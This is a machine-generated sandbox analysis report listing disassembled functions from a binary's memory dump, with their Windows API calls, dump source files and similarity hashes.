                                                                                                                                  • API String ID: 3981382179-2494417897
                                                                                                                                  • Opcode ID: 3c2b5f2f9720a2f01ef692577bfdeb8cff382d867d9a556b480b5d519e165902
                                                                                                                                  • Instruction ID: e014dcca224c4b794e7066a766863aa8b57ef5c3ef65ae1101ab9961b48bf481
                                                                                                                                  • Opcode Fuzzy Hash: 3c2b5f2f9720a2f01ef692577bfdeb8cff382d867d9a556b480b5d519e165902
                                                                                                                                  • Instruction Fuzzy Hash: 07216576B00118ABCB14DFA5DC84DEE77BEEF89714B104094F509EB151DB30AE46DBA0
                                                                                                                                  Function 00EBC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EBC948,SwapMouseButtons,00000004,?), ref: 00EBC979
                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00EBC948,SwapMouseButtons,00000004,?,?,?,?,00EBBF22), ref: 00EBC99A
                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,00EBC948,SwapMouseButtons,00000004,?,?,?,?,00EBBF22), ref: 00EBC9BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                  • Opcode ID: c3cd46fb81213781f93d208a4fe999d73430da7b5bc2ec6030e4681974c108d0
                                                                                                                                  • Instruction ID: 2bcfbfe363d595c583d54a622dd75701f9be2bc39c96e184593a005a277fdc90
                                                                                                                                  • Opcode Fuzzy Hash: c3cd46fb81213781f93d208a4fe999d73430da7b5bc2ec6030e4681974c108d0
                                                                                                                                  • Instruction Fuzzy Hash: 91117C75515208BFEB21CF64DC44EEF7BB8EF44748F20541AA941F7214D2319E41AB60
                                                                                                                                  Function 00EDA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cef2034c7210d13e6a79e242d14e34984c687cc785cb9e0908838cff2dfcf449
                                                                                                                                  • Instruction ID: 301ccebd0c455a35d9210a73df214d285af0bfb502ac384bb6b807c8ba2392c4
                                                                                                                                  • Opcode Fuzzy Hash: cef2034c7210d13e6a79e242d14e34984c687cc785cb9e0908838cff2dfcf449
                                                                                                                                  • Instruction Fuzzy Hash: 16C17F75A00216EFCB14CFA4C994EAEB7B5FF48704F1455AAE801AB391D730DE42CB51
                                                                                                                                  Function 00EA131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00EA1751
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EA159B
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EA1612
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F158F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                  • String ID: '/
                                                                                                                                  • API String ID: 458326420-966873530
                                                                                                                                  • Opcode ID: 9f4fc9932ada7ed8a503e6de763923d2a389504b27f1c567da449359bbedddf0
                                                                                                                                  • Instruction ID: b04a8bb28324be20233cb63c84161298409428311787f799dc3c38b09423a2af
                                                                                                                                  • Opcode Fuzzy Hash: 9f4fc9932ada7ed8a503e6de763923d2a389504b27f1c567da449359bbedddf0
                                                                                                                                  • Instruction Fuzzy Hash: 8271DCB480124C8FC710DF6AED91494BBE4FB9A34579C926ED02ADB362CBB05818FF51
                                                                                                                                  Function 00EECC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA41A7: _fseek.LIBCMT ref: 00EA41BF
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  • _free.LIBCMT ref: 00EECDC9
                                                                                                                                  • _free.LIBCMT ref: 00EECDD0
                                                                                                                                  • _free.LIBCMT ref: 00EECE3B
                                                                                                                                    • Part of subcall function 00EC28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28DE
                                                                                                                                    • Part of subcall function 00EC28CA: GetLastError.KERNEL32(00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28F0
                                                                                                                                  • _free.LIBCMT ref: 00EECE43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                  • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                  • Instruction ID: ad0064367bc018293f84828634e6f7d637c6987e434cb368d957085d91c259f1
                                                                                                                                  • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                  • Instruction Fuzzy Hash: 22515BB1904218AFDF149F64CC81BAEBBB9FF48300F1014AEF219B7291D7715A818F29
                                                                                                                                  Function 00EA1E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EA1E87
                                                                                                                                    • Part of subcall function 00EA38E4: _memset.LIBCMT ref: 00EA3965
                                                                                                                                    • Part of subcall function 00EA38E4: _wcscpy.LIBCMT ref: 00EA39B5
                                                                                                                                    • Part of subcall function 00EA38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EA39C6
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00EA1EDC
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA1EEB
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F14526
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  • Opcode ID: 8c473052158a4ed161c386d318e4ef295247c4fcf3317e345eed768f985c1caf
                                                                                                                                  • Instruction ID: 278c907230e75f7d1f480fe7b728d0b0be71092a2f3b0a6fd7c5de593f9b9bdd
                                                                                                                                  • Opcode Fuzzy Hash: 8c473052158a4ed161c386d318e4ef295247c4fcf3317e345eed768f985c1caf
                                                                                                                                  • Instruction Fuzzy Hash: 0321DA719043D4AFE732C7248855FE7BBEC9F46308F08508DE69E66141C3747A85DB51
                                                                                                                                  Function 00EF92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF282
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF2A6
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00EF92F0
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF92FB
                                                                                                                                  • _memmove.LIBCMT ref: 00EF9328
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00EF9333
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                  • Opcode ID: 95403a5ff26a8dc222d66bf296dad03b9171ad2cc95b24ac1dd6b538e397a1fc
                                                                                                                                  • Instruction ID: 2819ccb1db467041be872f69d6424614f3bf646a0beeea21a880357715650321
                                                                                                                                  • Opcode Fuzzy Hash: 95403a5ff26a8dc222d66bf296dad03b9171ad2cc95b24ac1dd6b538e397a1fc
                                                                                                                                  • Instruction Fuzzy Hash: 1A114976A00109AFCB04FBA0DD56DEEB7B9EF09310B145065F506BB2A2DB34AE04DB61
                                                                                                                                  Function 00EC010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC45EC: __FF_MSGBANNER.LIBCMT ref: 00EC4603
                                                                                                                                    • Part of subcall function 00EC45EC: __NMSG_WRITE.LIBCMT ref: 00EC460A
                                                                                                                                    • Part of subcall function 00EC45EC: RtlAllocateHeap.NTDLL(01100000,00000000,00000001), ref: 00EC462F
                                                                                                                                  • std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                    • Part of subcall function 00EC7495: RaiseException.KERNEL32(?,?,00EA125D,00F56598,?,?,?,00EC0158,00EA125D,00F56598,?,00000001), ref: 00EC74E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID: bad allocation
                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                  • Opcode ID: efa818b6e855cf5bf360c049d6cdcc57702064c0bf05b3e0df5ee747803ee8bb
                                                                                                                                  • Instruction ID: 678055851d30f3c995f809251d61960eea1622f7d3ae974d8d4aa8f38a9e92bb
                                                                                                                                  • Opcode Fuzzy Hash: efa818b6e855cf5bf360c049d6cdcc57702064c0bf05b3e0df5ee747803ee8bb
                                                                                                                                  • Instruction Fuzzy Hash: 7AF0CD3510521DA6C715ABACDE03FDDB7EC9F04354F14141DF904F2182DB72CA42DAA5
                                                                                                                                  Function 00EFF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 562d4ffc7227d1b17a7424d259b031e0f2f8714f3e2e56ec994bab64cb8e65a6
                                                                                                                                  • Instruction ID: ca7ba2b0844218f28fe42564e477fb8b8b5ff495f9b213294cae76082fe3aaee
                                                                                                                                  • Opcode Fuzzy Hash: 562d4ffc7227d1b17a7424d259b031e0f2f8714f3e2e56ec994bab64cb8e65a6
                                                                                                                                  • Instruction Fuzzy Hash: 2DF17D716087059FC710DF24C980B6AF7E5FF88314F14992EFA99AB291D770E945CB82
                                                                                                                                  Function 00F18071 Relevance: 4.8, APIs: 3, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 19560607-0
                                                                                                                                  • Opcode ID: fc30a7db4027f6171849eb2f6bea8de1d2ce6490f070d7d53a8de0cb649a41ce
                                                                                                                                  • Instruction ID: 6ff7e43e9c732120c90ac36a3cf9a17926d2a8fa5c04e396d75cad44e6539cc1
                                                                                                                                  • Opcode Fuzzy Hash: fc30a7db4027f6171849eb2f6bea8de1d2ce6490f070d7d53a8de0cb649a41ce
                                                                                                                                  • Instruction Fuzzy Hash: 7AA19E749006069BCB24DF68C882AEAF7F5FF04314F689529E859BB355D735ED82CB80
                                                                                                                                  Function 00EAC610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00EAC00E,?,?,?,?,00000010), ref: 00EAC627
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00EAC65F
                                                                                                                                  • _memmove.LIBCMT ref: 00EAC697
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                  • Opcode ID: 585f2d99d8dbc64e9ce2744ce59b9a990eb4a18f4f4fb62ebd681d2be7b30be0
                                                                                                                                  • Instruction ID: abfda7411203b243ee120c283398121d5e1d5506a9f0c38fe81cb633b52d02c1
                                                                                                                                  • Opcode Fuzzy Hash: 585f2d99d8dbc64e9ce2744ce59b9a990eb4a18f4f4fb62ebd681d2be7b30be0
                                                                                                                                  • Instruction Fuzzy Hash: 923139B2201201ABD724DB38D842F6BB7D9EF89310F24553EF95ADB290EB32E950C751
                                                                                                                                  Function 00EC45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00EC4603
                                                                                                                                    • Part of subcall function 00EC8E52: __NMSG_WRITE.LIBCMT ref: 00EC8E79
                                                                                                                                    • Part of subcall function 00EC8E52: __NMSG_WRITE.LIBCMT ref: 00EC8E83
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00EC460A
                                                                                                                                    • Part of subcall function 00EC8EB2: GetModuleFileNameW.KERNEL32(00000000,00F60312,00000104,?,00000001,00EC0127), ref: 00EC8F44
                                                                                                                                    • Part of subcall function 00EC8EB2: ___crtMessageBoxW.LIBCMT ref: 00EC8FF2
                                                                                                                                    • Part of subcall function 00EC1D65: ___crtCorExitProcess.LIBCMT ref: 00EC1D6B
                                                                                                                                    • Part of subcall function 00EC1D65: ExitProcess.KERNEL32 ref: 00EC1D74
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • RtlAllocateHeap.NTDLL(01100000,00000000,00000001), ref: 00EC462F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  • Opcode ID: b7af6f536ea737c602de32aceb41df39856053b1e1624201c1885994b121e1b6
                                                                                                                                  • Instruction ID: f75a1fcd80bedf82c607acb766e83765fd5d76232e2a71482fddb37266cee418
                                                                                                                                  • Opcode Fuzzy Hash: b7af6f536ea737c602de32aceb41df39856053b1e1624201c1885994b121e1b6
                                                                                                                                  • Instruction Fuzzy Hash: BD01F9726012019AE6342B34AF22F6E3788AF82765F51202EF601B72C5DFB39C438664
                                                                                                                                  Function 00EAE60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00EAE646
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00EAE651
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE664
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4217535847-0
